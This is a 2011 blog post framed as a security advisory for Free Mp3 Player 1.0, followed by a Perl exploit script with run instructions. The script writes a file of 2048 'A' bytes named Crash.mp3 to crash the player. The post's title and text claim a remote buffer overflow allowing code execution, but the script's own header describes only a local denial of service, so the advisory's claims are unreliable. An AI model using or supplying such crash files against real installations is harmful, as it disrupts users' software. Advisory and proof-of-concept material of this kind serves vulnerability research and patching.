Free Mp3 Player '.mp3' File Remote Buffer Overflow Vulnerability - 22 December 2011 - Rahul Tyagi Official Blog | Information Security
Sunday, 2016-12-11, 4:52 PM
Welcome Guest | RSS
Site menu
Login form
Buy Wifi Hacking Adapter
 

Best Laptop for Hacking
 










Main » 2011 » December » 22 » Free Mp3 Player '.mp3' File Remote Buffer Overflow Vulnerability
11:25 AM
Free Mp3 Player '.mp3' File Remote Buffer Overflow Vulnerability
Free Mp3 Player is prone to a remote buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer.An attacker can exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely result in denial-of-service conditions.

Free Mp3 Player 1.0 is vulnerable; other versions may also be affected.

Exploit Code

#!/usr/bin/perl
 
# Exploit Title:  Free Mp3 Player 1.0 Local Denial of Service
# Date: 19-12-2011
# Author: JaMbA
# Download:
http://www.softpedia.com/get/Multimedia/Audio/Audio-Players/Free-Mp3-Player.shtml
# Version: 1.0
# Tested on: Windows 7
 
my $file= "Crash.mp3";
my $junk= "\x41" x 2048;
open($FILE,">$file");
print $FILE $junk;
print "\nCrash.mp3 File Created successfully\n";
print "\ Dz-Devloper Work Team (Ahmadso best friend)\n";
close($FILE);


Just save this code as [anyname].pl for make it executable in perl.

Solution:- Currently we are not aware of any vendor-supplied patches.



Source



Views: 888 | Added by: defaultNick | Tags: Buffer Overflow Vulnerability, Free Mp3 Player '.mp3', File Remote | Rating: 0.0/0
Wifi Hacking Adapter : Recommended by Rahul Tyagi